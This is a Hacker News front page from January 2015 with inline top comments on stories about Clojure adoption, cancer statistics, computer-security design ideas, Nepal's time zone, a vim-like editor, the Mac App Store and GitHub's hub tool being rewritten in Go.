hacker news with inline top comments - 2 Jan 2015
Clojure 2014 Year in Review
152 points by fogus  5 hours ago   35 comments top 11
zeroDivisible 3 hours ago 1 reply      
For everybody who wants to start Clojure: I know that there are loads of good resources, but the best one I have found is this online MOOC:


Teaches you TDD in Clojure and "forces" you to use git / Github / Travis to test your code.

Highly recommended.

edit: style.

dominotw 55 minutes ago 1 reply      
I am not sure I would use RedMonk Index as popularity measure.

Most people I see using Clojure are bored Ruby programmers, and they brought their open source culture with them to Clojure.

Clojure is not even in the top 50 on the TIOBE index: http://www.tiobe.com/index.php/content/paperinfo/tpci/index....

mikerichards 55 minutes ago 3 replies      
Are we beginning to see the tipping point where mainstream corporates are starting to question whether traditional OO is the right way to go?

Not to start a flame war, but it seems that Clojure/Rich's strong anti-OO stance is almost a selling point of the language.

IMHO, OO just put some lipstick on the procedural pig.

jeremiep 4 hours ago 2 replies      
This is great! Glad to see more Clojure adoption in the corporate world. It's definitely well deserved!

I used it only once at work to develop a stress test for a Java based game server. It was great fun to build, worked like a charm and ended up taking less than a thousand lines of code to implement the communications, bots and their execution scripts.

Furthermore, the company just bought a copy of The Joy of Clojure and there's already a bunch of my coworkers interested in reading it. Good times!

thom 33 minutes ago 0 replies      
Are people finding it easy/easier to fill clojure positions?
JBiserkov 3 hours ago 1 reply      
Microsoft/Nokia is using Clojure to power the web services behind MixRadio.
dmix 1 hour ago 0 replies      
Not mentioned in the article but most interesting to me this year is how these guys are "building a bank from scratch in Brazil with Datomic and Clojure": https://www.youtube.com/watch?v=7lm3K8zVOdY

The future looks bright for the language, especially with applications like this.

mikerichards 1 hour ago 0 replies      
The amount of traction that Clojure is getting in companies like Walmart, Amazon, and elsewhere is surprising and impressive.

Great work Clojure community.

coding4all 1 hour ago 1 reply      
I've been writing Clojure almost exclusively for 3 or 4 years and it's just amazing. Core.async, Quil, Om, Chestnut, ClojureScript, ClojureScript + Apache Cordova, and I could go on forever.
davexunit 1 hour ago 2 replies      
Since Clojure adoption is picking up, what about convincing management to use other Lisps now? Clojure is okay, but I much prefer Scheme (Guile, Racket, Chicken, etc.).
147 2 hours ago 1 reply      
I'd like to add that I'm starting a Clojure job next Monday at a "boring" company that you would never think would rely heavily on Clojure. I think there's demand for Clojure developers that is unmet; I keep getting recruiters and the like messaging me about Clojure.
Bad luck, bad journalism and cancer rates
97 points by auton1  4 hours ago   29 comments top 6
MisterMashable 1 minute ago 0 replies      
Whatever the official cause of cancer it will never be food additives, processed or poor quality foods, prescription drugs, air pollution, contaminants in the water supply, contaminated vaccines (I'm a believer in vaccines so don't go there!), new car smells, pesticide residues in food and clothing, fire retardant chemicals, xenoestrogens, secondary cancers caused by chemotherapy or radiation... it will just be bad luck.
therealdrag0 12 minutes ago 0 replies      
I want to reiterate the article's recommendation of the book "Bad Science" by Ben Goldacre [0]. I learned a lot from it and found it enjoyable - and it's available in audiobook form.

[0] http://smile.amazon.com/Bad-Science-Quacks-Pharma-Flacks/dp/...

toufka 2 hours ago 3 replies      
Here's the deal: we know it's 'chance' (not really luck) which part of your DNA is damaged by any given environmental effect. However, some DNA is more important than other DNA. In general, a little damage is not a problem and is easily 'taken care of' by the cell that carries that DNA - either by literally repairing the DNA, silencing that DNA's function, killing itself, or asking other cells to help kill it.

We know quite clearly that cancer is (generally) caused by a set of mutations - not necessarily in a fixed order, though some orders are not successful. There are four or five genes which keep social order amongst the other genes. If you silence all of these, you get cancer. Chance has its role in the roll of the dice for which DNA gets damaged, but all the other parameters can be changed too - how many sides the dice have, how often the dice get rolled, and whether all the cells in the same tissue have correlated dice rolls.

Cells that deviate from what they're supposed to do are (in order) repaired, silenced, induced to commit suicide, or killed. There are proteins (genes) that are the final judges for each of these processes - and have 'go, no-go' power. Only if all of these judges are killed do you get a cell that can do anything it wants - like replicate uncontrollably to the detriment of the host ('cancer'). Thus the statistics of getting cancer roughly follow the idea that you have to get random DNA modifications of those exact 5 genes, in a single cell. Lots of things can increase your random modification rate (UV, smoke, radiation, etc.). Some of these things correlate, though - and again, what hurts one cell might hurt its neighbor just as badly. They're not entirely independent events. For example, losing your DNA repair machinery (this is what HPV does - it silences your DNA repair machinery) amps up the baseline mutation rate and makes further mutations more likely (dependent correlations then arise).

The Brca gene that has caused so much controversy in patent law (whether a test for its existence could be patented), and which indicates whether a person might be susceptible to breast cancer, is the master repair technician of the cell. In people who have this gene in working order, the Brca gene signs off on whether the cell is in need of repair. But if Brca is not in working order, cells that need repair might not get it, and are instead allowed to operate more freely under non-optimal internal conditions. If you are missing Brca or have a mutated version, you are missing one of the checkpoint processes.

So again, we quite clearly know of a handful of genes which do most of the master regulation of a cell's job - and if these jobs go unfulfilled - by having their blueprints be damaged by the environment - you have fewer and fewer mechanisms to prevent that single cell from runaway growth.
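The multi-hit picture sketched above lends itself to a quick Monte Carlo check. The numbers below (five guardian genes, the per-division mutation probabilities, the division counts) are purely illustrative, not real biology:

```python
import random

def lineage_becomes_cancerous(n_guards=5, mutation_prob=3e-4,
                              divisions=2000, rng=None):
    """One cell lineage: at each division, every still-intact guardian gene
    is independently knocked out with probability mutation_prob. The lineage
    turns cancerous only once all guardian genes are gone."""
    rng = rng or random.Random()
    intact = n_guards
    for _ in range(divisions):
        intact = sum(1 for _ in range(intact)
                     if rng.random() >= mutation_prob)
        if intact == 0:
            return True
    return False

def cancer_rate(n_lineages=500, seed=42, **kw):
    rng = random.Random(seed)
    return sum(lineage_becomes_cancerous(rng=rng, **kw)
               for _ in range(n_lineages)) / n_lineages

# Raising the mutation rate tenfold (think UV, smoke, or losing the DNA
# repair machinery as with HPV) dramatically raises the fraction of
# lineages that eventually lose all five guards.
low = cancer_rate(mutation_prob=3e-4)
high = cancer_rate(mutation_prob=3e-3)
```

The point matches the parent's: the dice rolls stay random, but anything that changes the rate (or correlation) of the rolls changes the outcome statistics.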

ekianjo 1 hour ago 5 replies      
Wait, is this an article from the Guardian making fun of their own article on the same study earlier on? See http://www.theguardian.com/society/2015/jan/01/two-thirds-ca... If that's the case, that's a novel way of doing journalism: publish crap first, then sell more papers by critiquing your own crap.
termostaatti 54 minutes ago 1 reply      
Naturally the way one lives has an impact on whether one will get cancer. Smoking, drinking, eating certain types of (badly manufactured) food, etc. all have a direct relation to cancer. It's never just luck who happens to get these horrible diseases.
Baseline Mac OS X Support merged into FreeBSD package manager
25 points by emaste  47 minutes ago   7 comments top 2
aduitsis 4 minutes ago 0 replies      
This is great news. Pkgng is very easy to use and achieves a very good combination of binary packages and the FreeBSD ports tree when you want to compile stuff yourself - which, admittedly, happens more often than expected.
santaclaus 16 minutes ago 3 replies      
Interesting! What is the advantage of the FreeBSD package manager over existing OS X package managers like Homebrew or MacPorts?
What Will the World Speak in 2115?
16 points by prostoalex  1 hour ago   12 comments top 5
natrius 9 minutes ago 0 replies      
I don't know how people will communicate in 2115, but I can't imagine a 2115 where every human doesn't know every language without any effort at all. How can a discussion of life that far in the future not mention how computers will shape it?
eddielee6 36 minutes ago 3 replies      
Prediction: Everyone speaks in JavaScript
sbmassey 15 minutes ago 0 replies      
I don't think the loss of a language without a literature is much of a loss, really.

Also Navajo, though grammatically odd to speakers of Indo-European languages, doesn't seem to consist of all irregular verbs as the article suggests.

walterbell 23 minutes ago 0 replies      
No mention of cross-language icons, signs and emoji?
rokhayakebe 38 minutes ago 3 replies      
I have a different opinion. I think people will stick to their languages, and some will die naturally.

However, one new language will emerge. It will be a set of 500 to 1000 words that anyone can learn and use to communicate world wide.

Similarly to a programming language, this one will be limited in words and easy to pick up. This language will act as a framework, giving people the essentials they need for basic communication. 500 to 1000 words.

Clojure at a Newspaper
15 points by tim333  1 hour ago   2 comments top 2
untog 6 minutes ago 0 replies      
Not to talk down Clojure, but it sounds like the real success here was being able to reinvent existing systems, and having a CTO willing to give you the space to do it.

After all, the majority of sites like this are getting data from <data store>, squeezing it through <template> and delivering it to the user's browser. The language you do that in will have a much smaller effect than, say, your caching strategy (particularly at a high-volume site like MailOnline).

taylorlapeyre 32 minutes ago 0 replies      
Great language, great community. Glad to see its adoption spreading.
Dumb Ideas in Computer Security (2005)
63 points by corv  3 hours ago   26 comments top 10
lmm 2 hours ago 1 reply      
Not the dumbest by any means.

What this idea seems to miss is that most of the value created in computing - not just among professional software developers but also among ordinary users - comes when people do things that the creators hadn't thought of. You could run every program in its own isolated space where it can only touch its own stuff, and this would eliminate a lot of vulnerabilities (we see this today on mobile). But as soon as you want to script your image resizes based on a spreadsheet or whatever, that model breaks down (or else you end up with everything tunneled over the few approved vectors; iPhone users Dropbox files just so that they can open them on the same phone in a different program). And worse, users end up utterly beholden to the few entities with "real" access.

It's very easy to create a secure computer, by turning it off. But that doesn't help anyone. In the long run, the cure of deny-by-default is worse than the disease.

justsomedood 1 hour ago 2 replies      
I really don't understand how "3) Penetrate and Patch" is a bad idea. The argument is:

> Your software and systems should be secure by design and should have been designed with flaw-handling in mind

I'm not sure I would argue that systems that have been hacked were intentionally insecure by design; rather, the developers thought they were secure by design and were just wrong. It seems totally unrealistic to say "just make it secure instead" as the solution, especially when machines are connected to the outside world.

michaelt 2 hours ago 2 replies      

  The most recognizable form in which the "Default Permit" dumb idea
  manifests itself is in firewall rules. [...] The opposite of "Default
  Permit" is "Default Deny" and it is a really good idea.
And now you know why everything from version control systems to video conferencing software tunnel things over HTTP!
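The contrast the quoted article draws is easy to state as code. A toy packet filter (the port numbers here are illustrative, not a recommendation):

```python
ALLOWED_PORTS = {22, 80, 443}    # explicitly enumerated "goodness"
BLOCKED_PORTS = {23, 135, 445}   # explicitly enumerated "badness"

def default_deny(port):
    """Permit only what is on the allowlist; everything else is dropped."""
    return port in ALLOWED_PORTS

def default_permit(port):
    """Drop only what is on the blocklist; everything else sails through."""
    return port not in BLOCKED_PORTS

# A brand-new service on port 31337 is dropped under default-deny but
# permitted under default-permit - which is why enumerating badness
# never keeps up with new threats.
```

It also shows why everything tunnels over HTTP: port 80 is on everyone's allowlist.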

sharpneli 1 hour ago 0 replies      
#1 I've never understood this as a concept. Why on earth would you first run an FTP server and then block the port it uses?

Sure it helps if someone sneakily installs stuff but that's the reason why so many things are nowadays tunneled via HTTP. Because everything is always blocked.

The point about load balancer whitelisting was a good one.

#2 works only if you choose iOS style environment where a single entity, Apple in that case, decides what to run and what not to run.

Otherwise it falls into the "Cute rabbit" category. E.g.: if a user gets a mail saying "Click here to see a cute rabbit!", they will click everything and bypass all security dialogs just to see the cute rabbit. And/or they will grow desensitised and click "Yes" on every dialog. The old UAC dialog in Windows Vista was an excellent example of this: everyone just automatically clicked yes because it popped up all the time.

#3 is just "Don't write buggy software". Yeah. We wouldn't if we were smart enough.

iokevins 3 hours ago 4 replies      
It seems the author originally published this in 2005; reaching the bottom: "Morrisdale, PA Sept 1, 2005." On the linking page, http://www.ranum.com/security/computer_security/index.html, it states, "(originally written for certifiedsecuritypro.com)."

Might the submitter have meant to make a point about the predictions made by the author, ten years ago? For example, "My prediction is that the "Hacking is Cool" dumb idea will be a dead idea in the next 10 years."

gpcz 2 hours ago 2 replies      
I read this article a few years ago and thoroughly enjoyed it, but I've had trouble solving Default Permit in practice. Does anyone know of a free software operating system that white-lists its software (say by having the white-list be tied to the package manager) without having to do a lot of tinkering/configuring? I know you can do it with certain Linux add-ons that provide mandatory access control like SELinux and grsecurity, but it always seems like they introduce problems that you then have to troubleshoot for hours before your system is usable again. Bonus points for if this distro uses ASLR, W^X, and other countermeasures to avoid violating the security policy through code injection.
ademarre 31 minutes ago 1 reply      
An example of what he calls "Enumerating Badness" and "Default Permit" is seen today in web application firewalls (WAFs) that try to block XSS payloads. It conceals the real problem, which is a vulnerability in the web app itself, and it's a tall order to expect the WAF to capture 100% of XSS payloads.
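A toy illustration of the parent's point (the regex and payload below are the classic textbook case, not any particular WAF's actual rule):

```python
import html
import re

# Toy "enumerate badness" rule: block anything that looks like a script tag.
BLOCKLIST = re.compile(r"<script", re.IGNORECASE)

def waf_blocks(payload):
    """Default Permit: block only what the blocklist anticipated."""
    return bool(BLOCKLIST.search(payload))

# A classic XSS vector that never uses a <script> tag sails straight past.
payload = "<img src=x onerror=alert(1)>"

# Fixing the app itself: encode on output so any markup is inert,
# whether or not anyone anticipated the payload.
safe = html.escape(payload)
```

The WAF has to anticipate every payload individually; output encoding in the web app makes the whole class inert.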
shalmanese 6 minutes ago 0 replies      
It's actually quite easy to make a business that is absolutely secure. You simply turn off all of your computers, fire all of your employees, sell off all your assets and empty your bank accounts. There, now you have a business that's absolutely unhackable.

What this hopefully demonstrates is that security is never the final goal, it's always a proximate goal and will always exist in tension with other goals.

Default Permit: We've all heard stories about dumb corporations where programmers couldn't even install a compiler without filling in a form and waiting a month. Default Deny kills productivity in a workplace because of the 80/20 rule. It's very easy to whitelist the 20% of apps that account for 80% of the usage but nigh impossible to whitelist the 80% of apps that are specific and niche. There was a post a few days ago about some guy working for immigration who figured out how to automate his job with UI scripting. That would have never happened under a Default Deny workplace.

Enumerating Badness: Like he said, this is a specialized version of Default Permit and all the same criticisms apply.

Penetrate and Patch: Building software that is architecturally secure is hard because it often imposes global constraints against your code. Global constraints get harder to implement as you start distributing your team in space and time and as you need to adapt code to changing requirements. Penetrate and Patch works because it allows you to deliver code quicker which is overwhelmingly more important than delivering secure code.

Hacking is cool: that he brings up spammers instantly undermines this argument, since there's nothing less cool than spammers, yet spam has grown as fast if not faster than hacking over time. The threat vectors of most concern to companies nowadays are nation states, organized crime, and economic extortionists who couldn't care less how "cool" their job is.

Educating users: I remember when GMail started stripping out .exes from emails so we would start sending exes inside of zips. Then GMail started inspecting .zip files so we would change the file extension to .zip2. Then Google started detecting ZIP signatures so we started sending encrypted zip files just so we could email exes to each other. Why? Because emailing exes turned out to be a really, really useful thing to do. Any kind of paternalistic security policy inevitably ends up damaging more productive work than it does protecting against threats.

Action is better than inaction: Tell that to all of the industries that have been disrupted because they didn't stay sufficiently on top of trends. There are pros and cons to being an early adopter vs a late adopter but one is not universally better than the other.

The main point through all of this is that when bad security practices are widespread, it's usually because it's in conflict with some other business goal and there are rational reasons why security lost out. There aren't many silver bullet fixes because if there were, they would have been deployed already.

ThrustVectoring 2 hours ago 0 replies      
>Wouldn't it be more sensible to learn how to design security systems that are hack-proof than to learn how to identify security systems that are dumb?

Part of the way you design hack-proof security systems is by identifying the dumb ways of doing things and then not doing them.

squozzer 2 hours ago 1 reply      
Pretty good ideas, but transitioning from the current state to the author's ideas will bring a lot of pain.

#1 - Default Permit - if aliens arrived and hacked all of our systems to enforce "default deny" - we'd all die within a week. Nothing would work. Game over, civilization. Ask the author if he'd sanction a "default deny" switchover on the systems that control his mom's respirator.

If that sounds like an indictment of status quo, you're right. But how do you handle a skid? Not by turning the wheel full lock in the opposite direction, certainly.

Hard to argue with #2 or #3 but of course alternatives depend greatly on the availability of talent, of which there is precious little. Just getting things to work requires most of our bandwidth.

Now, if I ruled the IT world, my devs would be ex-chemical engineers (a profession that seems adept at understanding dynamic processes) who have world-class comprehension of every layer of my tech stack AND who were provided with unlimited budgets and time, with proper prototyping and other great engineering practices.

#4 - Hacking is cool if in service of a noble goal, just as murder is when fighting an aggressive enemy or burglary is when it uncovers something nefarious. But otherwise, it's just plain B&E.

#5 - Educating users. I think we have another transition issue on our hands - most of today's users are clueless, sure. But tomorrow's will only be on guard against what works today. Maybe the author thinks everyone over a certain age is obsolete, or that only security people know what's best for users. In either case, let's hope the author doesn't attempt to fit their template onto other aspects of society.

#6 - Assuming the author is right, if everyone adopts a wait-and-see approach, who will act as the early adopters whose brains one can pick? Certainly IT has a lot of gratuitous product / idea churn, and cluelessness seems to prevail in a lot of decisions, but I doubt fastidious conservatism will fare any better.

Lizard Squad attacks Brian Krebs
38 points by MarcScott  2 hours ago   13 comments top 6
Buge 42 minutes ago 0 replies      
In the past he's also been swatted and had drugs mailed to him, and a flower cross saying RIP Brian Krebs.
freshyill 1 hour ago 0 replies      
The article says they knocked him offline only briefly, but I'm actually having trouble loading krebsonsecurity.com right now.
codyb 1 hour ago 3 replies      
I wonder how he tracks them down? And if he can find two so easily (on his own?), how had they not been outed already?
justizin 13 minutes ago 0 replies      
yawn, brian krebs is like the tom clancy of internet security
sroerick 39 minutes ago 0 replies      
Hah, why does CNN have a "Happy Birthday Playstation" message on this page?
ExpiredLink 27 minutes ago 1 reply      
> Lizard Squad ruined Christmas for people around the world

Come on!

Stingrays Go Mainstream: 2014 in Review
35 points by fearfulsymmetry  2 hours ago   2 comments top 2
guelo 24 minutes ago 0 replies      
In the balance between police secrecy of "sources and methods" and government transparency we need to lean heavily towards transparency because preserving democracy is more important than fighting crime.

As technology advances these issues are going to get creepier and scarier and as a society we need to have open debates about the powers that we're willing to grant governments.

Every new crime fighting technology needs to be vetted by the public before police get access to them.

dang 1 hour ago 0 replies      
Nepal Standard Time
17 points by gkop  4 hours ago   11 comments top 5
jtokoph 2 minutes ago 0 replies      
Tom Scott has a wonderful video walking through the overwhelming complexity of timezones: https://www.youtube.com/watch?v=-5wpm-gesOY
annapurna 49 minutes ago 0 replies      
"[It] was not till 1956 that [Nepal] set [their] watches for the first time to Nepal Standard Time, with the meridian at Mt Gauri Shankar, 100km east of Kathmandu [capital of Nepal]. It wasn't Mt Everest because Gauri Shankar was closer to Nepal's centre of gravity, as it were.

It was a choice that set [Nepal's] clocks 10 minutes ahead of India, which at the time used the longitude that passed through Calcutta. When [India] switched their meridian to Hyderabad in 1971, [Nepal] officially had four degrees of separation, and presto, found ourselves a further five minutes ahead of the Indians."


ArtDev 28 minutes ago 0 replies      
In Nepal the year is 2071 (http://en.wikipedia.org/wiki/Nepali_calendar)

It is an amazing country. Nepal is the "roof of the world".

nnain 4 hours ago 1 reply      
It's pretty weird indeed. Think of the misery of a traveler from/to Nepal who has to do the extra mental math every time to figure out the time for another place.

They could have settled for an easier offset, considering the country stretches over quite a few longitudes. I don't know what the logic was here!
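The mental math in question is easy to model with Python's standard library (the date below is chosen arbitrarily):

```python
from datetime import datetime, timedelta, timezone

NST = timezone(timedelta(hours=5, minutes=45), name="NST")  # Nepal, UTC+05:45
IST = timezone(timedelta(hours=5, minutes=30), name="IST")  # India, UTC+05:30

noon_utc = datetime(2015, 1, 2, 12, 0, tzinfo=timezone.utc)
in_kathmandu = noon_utc.astimezone(NST)  # 17:45 local
in_delhi = noon_utc.astimezone(IST)      # 17:30 local

# Kathmandu runs 15 minutes ahead of India - the "extra mental math".
diff = in_kathmandu.utcoffset() - in_delhi.utcoffset()
```

Software handles the quarter-hour offset fine; it's humans doing the conversion in their heads who suffer.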

mshakya 43 minutes ago 1 reply      
So does this mean that NST uses the distance between the Indian meridian and Mt. Gauri Shankar to set the time?
Design of a Vim-like text editor
152 points by ProfDreamer  9 hours ago   57 comments top 17
faragon 2 minutes ago 0 replies      
The source code of vis looks great, and the executable is about 100 KiB (x86-64). The editor does not behave exactly like vi/vim, but it is quite acceptable.

I like the suckless manifesto, recommended projects, etc. a lot: http://suckless.org/

_b 2 hours ago 0 replies      
Right now, using vim is better than using this new editor (vis), although vis is close to being substantially better than vim.

I use the suckless window manager (dwm) and terminal (st), so gave vis a try for a couple days. Three vim plugins made me return: git-gutters, you-complete-me (ycm), and clang-format.

It is hard to extend vim's functionality. Its plugin interface has issues. Because of that, ycm and git-gutters cannot be used at the same time, and something that ought to be straightforward, like exposing clang's autocomplete information, requires a considerable engineering effort (ycm) spanning three languages and about as much code as vis has in total.

Giving vis good extensibility would be easier than fixing vim's plugin interface (sorry neovim). My personal preference for doing this would be a patch to vis that adds vim-like gutters and dropdowns, and then patches that require this one and add specific things like ycm and git-gutters. A reasonable programmer could disagree and prefer out-of-process plugins. Either approach being implemented well would be very exciting.

gchp 2 hours ago 1 reply      
I'm currently building a similar project in Rust called iota: https://github.com/gchp/iota

I don't intend it to be a vim clone, however I'm currently adding some features which I've borrowed from vim. The main one being modal editing. Its much earlier on than this project, though.

As a side note, building a text editor is great fun, one of the most interesting projects I've worked on!

Myk267 3 hours ago 0 replies      
I'm always interested in the suckless projects. I like emacs and vim, too, but it's interesting to see projects made which can just grab the fork, a sharp knife, and a good pan and make do instead of necessarily including the kitchen sink, if I may get the analogies out.

Also, no tests? Phew!

mikejholly 4 hours ago 1 reply      
So weird to see this at #1 since I was researching this exact topic last night. My idea is a fully scriptable (Racket or CL) editor with modern package management system. A tiny C core would handle rendering (curses, etc.). Very cool write up though!
ryandvm 7 hours ago 1 reply      
I've been using Vim for over a decade. I love it. But I feel more and more anachronistic every time I have to hunt down some Vim plug-in for whatever IDE I'm setting up.

I'd love to see a fresh take on hyper-efficient text editing in modern GUI environments.

spain 5 hours ago 5 replies      
How about an embedded Lisp interpreter?
rejschaap 4 hours ago 1 reply      
Obviously, I don't know what the author personally experienced. But since this is on the suckless mailing list, reading their philosophy[0] is probably a good starting point.

[0] http://suckless.org/philosophy

shurcooL 2 hours ago 1 reply      
That was a very interesting read. I might want to implement some of those things in my text editing component.

I have one question. How would they implement "go to line number" functionality? How fast would it be?

oneeyedpigeon 3 hours ago 2 replies      
How do I submit a patch? Needs a couple of tiny mods to compile on OSX.
0xdeadbeefbabe 1 hour ago 0 replies      
You don't have to use posix to suck less you know, or do you?
flavioribeiro 6 hours ago 2 replies      
Great idea! I wonder why you aren't using github (or bitbucket, etc) for hosting the project. I personally think that early projects can benefit from tools like that, since people can follow the progress (issues, bugfixes, etc) and access the code without cloning the repo.
marktangotango 8 hours ago 0 replies      
Very interesting. I also found quite a lot of inspiration from reading about the Oberon system. This author was inspired by the text editor; I was more interested in the language. The author uses 'piece chains' as opposed to a gap buffer, which was new to me.

I'm sure many will say, why another editor? I say why not? Looks like a fun project.
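For readers unfamiliar with the term: a piece chain (piece table) never mutates the original file contents; edits just re-thread a list of spans pointing into two buffers. A minimal sketch, far simpler than vis's actual implementation:

```python
class PieceTable:
    """Minimal piece table: the original text is immutable; inserted text
    goes into an append-only 'add' buffer, and the document is a chain of
    (buffer, start, length) pieces. Edits splice pieces, not text."""

    def __init__(self, text):
        self.original = text
        self.add = ""
        self.pieces = [("orig", 0, len(text))] if text else []

    def text(self):
        bufs = {"orig": self.original, "add": self.add}
        return "".join(bufs[b][s:s + n] for b, s, n in self.pieces)

    def insert(self, pos, s):
        new_piece = ("add", len(self.add), len(s))
        self.add += s
        out, offset, placed = [], 0, False
        for b, st, n in self.pieces:
            if not placed and offset <= pos <= offset + n:
                cut = pos - offset          # split the piece at pos
                if cut:
                    out.append((b, st, cut))
                out.append(new_piece)
                if n - cut:
                    out.append((b, st + cut, n - cut))
                placed = True
            else:
                out.append((b, st, n))
            offset += n
        if not placed:                      # empty table or pos at end
            out.append(new_piece)
        self.pieces = out

pt = PieceTable("hello world")
pt.insert(5, ",")   # splices pieces without touching the original buffer
```

Go-to-line (asked elsewhere in the thread) is then a walk over the pieces counting newlines, typically accelerated with a cached line index.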

oscargrouch 4 hours ago 0 replies      
Instructions to compile the source on Freebsd:

in config.mk, change the line :




The flags (the removed ones) trigger the "__BSD_VISIBLE 0" macro, which makes the "SIGWINCH" signal unavailable; it is used in vis.c.

PythonicAlpha 4 hours ago 0 replies      
I would like to have a vim-clone, that also can handle embedded images.

Just a wish.

ExpiredLink 5 hours ago 2 replies      
Most of the "main goals" are supported by ... Eclipse!
amelius 7 hours ago 3 replies      
Why not write a rich-text editor instead? Or a web browser?

Seriously. They seem like more interesting endeavours to me. Especially if you document every step of the way. In fact, you could write a book about it.

Complications in Physics Lend Support to Multiverse Hypothesis
33 points by ghosh  3 hours ago   27 comments top 9
Steuard 2 hours ago 1 reply      
I used to believe that the history of physics gave unwavering evidence that there is always a deep reason for the patterns and phenomena we observe: maybe not for the specifics of everyday life, but certainly for fundamental facts. (Think of how atomic theory made sense of the elements, or how nuclear physics explained how the sun could shine for so long, or how the unification of electricity and magnetism miraculously turned out to explain optics as well.) So I was convinced that we would someday find a fundamental theory that would be able to predict things like the fine structure constant or the charge to mass ratio of the electron.

But eventually someone pointed out that before we understood the history and nature of the solar system, natural philosophers looked for similarly deep explanations for the orbits of the planets. Kepler once proposed a deep connection between the (five) gaps between the six known planets and the five platonic solids (see, e.g. http://www.pbs.org/wgbh/nova/blogs/physics/2011/12/beautiful...), and Bode's law for planetary orbits was widely accepted until Neptune was discovered in the "wrong" place in 1846 (see http://en.wikipedia.org/wiki/Titius%E2%80%93Bode_law).

Today, we understand that there is no reason to expect any particular pattern of planetary orbits: solar systems are a dime a dozen in the galaxy, and their details are accidents of history. So while I don't like the idea, I've gradually come to accept that the "fundamental physical constants" of our universe could conceivably turn out to be just as arbitrary as the ratio of Jupiter's major orbital axis to Saturn's.

kghose 2 hours ago 2 replies      

I can find nothing unnatural about the existence of a single universe with particular constants that give rise to life that then studies the universe. There is nothing in this that leads inevitably to the conclusion someone has been rolling the dice many times until this came about.

Animats 3 hours ago 2 replies      
The cosmology end of physics is kind of stuck right now. Many-worlds and the anthropic principle are back again. What they're theorizing about has way too much stuff that can't be observed or tested experimentally. Some people question whether this is even science.

"Science is prediction, not explanation." - Fred Hoyle.

TrainedMonkey 2 hours ago 0 replies      
We have developed highly accurate instruments that measure incredibly small and large things. Yet all of our scientific progress is biased, because we have evolved in a very specific environment that we handle well. Virtually all of our scientific measurements have been done in a relatively small time frame[1] and on one very specific planet with certain conditions[2].

I think it is way too early to call the universe unnatural. Sure, there is a chance that it might be true, but we are not going to find out until we have far more data. For one, there is so much in cosmology that we cannot explain yet, such as dark matter and accelerating expansion.

[1] Last 250 years or so.

[2] Gravity, magnetic field, stable trajectory around the sun (the sun's gravity is more or less unchanging)... I do know there are variations and experiments in microgravity, but all high-energy particle acceleration experiments have been done under much the same conditions.

elberto34 2 hours ago 0 replies      
End of science? Hardly. Just because we may be in a multiverse doesn't mean we should stop trying to figure out how our particular universe works, and this info may yield insight into the other universes. There is still so much to learn.
ccvannorman 3 hours ago 0 replies      
The deeper we go, the stranger things get. But I doubt scientists will "lose the desire to continue looking for new physics" as is warned by this article! We'll go deeper and things will get stranger, and that's just the way of human exploration.
gregonicus 2 hours ago 1 reply      
"Parallel universes cannot be tested for." The multiverse idea just sounds like a more respectable version of "turtles all the way down".
trhway 2 hours ago 0 replies      
>Physicists reason that if the universe is unnatural, with extremely unlikely fundamental constants that make life possible, then an enormous number of universes must exist for our improbable case to have been realized.

Somewhat reminiscent of what physics must have been like before Newton's laws: the cannonball flies this strange, seemingly unnatural trajectory, so it would sound reasonable to suppose that "an enormous number of universes must exist for our improbable case to have been realized." Though they were lucky back then to have God's will as an easy, always-available tool for explanation. We're not that lucky today. We have to continue digging :)

kazinator 43 minutes ago 1 reply      
The thing is, nothing you can discover in physics can refute the multiverse hypothesis. It is not falsifiable in that way.

Even if you find that you're in a very special universe, you need an explanation of why it is that way. The multiverse hypothesis helps, by giving a plausible answer which avoids belief in gods.

Benefits of Selling Outside the Mac App Store
51 points by milen  5 hours ago   16 comments top 5
tomkinstinch 2 hours ago 1 reply      
Another point to add is that applications sold outside the App Store can avoid the sandboxing restrictions of the Store, and can consequently contain functionality that would not be permitted by Apple on the Store (file access, deeper system access, etc.).

That said, for my side project ( http://artfulmac.com ) it is absolutely worth it to me as a solo developer to pay Apple their 30% to have them handle fulfillment (including system-integrated update notifications), payment processing (with currency conversion), tax form creation, and refunds. It's a trade of financial overhead for time. The App Store also conveys a sense of trust to consumers.

lnanek2 48 minutes ago 0 replies      
I think it is misleading to have a big picture of an iPhone at the top and talk extensively about selling outside the app store, when that isn't a realistic option for iOS smartphone developers. You are forced to use the App Store for the iPhone, since the number of jailbroken devices that can install other apps is too low. The author must be talking about Mac laptop/desktop apps.
pavlov 2 hours ago 2 replies      
The Mac App Store is a ghetto. It's completely neglected by Apple. I'm not sure who they imagine to be the target audience -- maybe it works for mobile-style game experiences, I wouldn't know, but it's certainly no good for professional apps.

Important issues with sandboxing were never resolved. Meanwhile existing APIs keep being moved to the restricted list, so as a developer you can't even count on your product being able to stay on the Mac App Store.

nathanbarry 3 hours ago 1 reply      
Really solid article. I love that it includes actual numbers.

"Apple has taken $600,000 (USD) of that in fees. Ouch!" is much more concrete than just "30% of revenue."

programminggeek 1 hour ago 0 replies      
I tend to think of selling to an app store as basically selling through Wal-Mart or Best Buy vs selling direct. Yes, selling direct is higher margin, but it's also got a different set of challenges. For example, you have to acquire customers on your own.

Probably the best way to look at it would be to treat the Mac App Store as a secondary channel. If it was a secondary sales channel, then it's additional revenue and new customers which is a nice to have.

You are probably best off creating your own customer list and selling directly to customers over time, away from the Mac App Store. Or you avoid it altogether and figure out how to sell direct. The only downside there is you have to do your own advertising and use something like Gumroad or FastSpring or some homegrown Stripe solution for delivery and such.

Nothing is perfect and there are tradeoffs to both approaches.

GitHub's hub tool rewritten in Golang
62 points by akerl_  2 hours ago   41 comments top 6
shawnps 2 hours ago 2 replies      
Reasoning behind porting it to Go: https://github.com/github/hub/issues/475

"My Ruby implementation of context.rb is getting unwieldy and in hub v1.11 I feel I've reached the limit of how much I can speed up hub execution. I can't make it much faster than 50 ms due to Ruby interpreter slowness. Go port can execute in under 10 ms, and it's not even specially optimized yet. Go port can also be distributed as a pre-compiled binary, skipping the need to install Ruby, which can be especially tricky and error-prone for Windows users."

bdcravens 4 minutes ago 0 replies      
Not uncommon. Cloud 66, a platform for hosting Rails apps, rewrote their toolchain in Go after it was originally written in Ruby.


Mike Perham, of Sidekiq fame, built his latest product in Go. Ditto for Mitchell Hashimoto: Vagrant is one of the most popular Ruby products out there, but most of the other tools his company builds are written in Go.

aikah 1 hour ago 1 reply      
Afaik it was previously in Ruby, right? I need to check out the source code, that's definitely an interesting project.

any windows build out there?

bentoner 37 minutes ago 0 replies      
Is there anything like this for gitlab?
taybin 2 hours ago 2 replies      
Isn't it more lines of code now?
karissa 2 hours ago 10 replies      
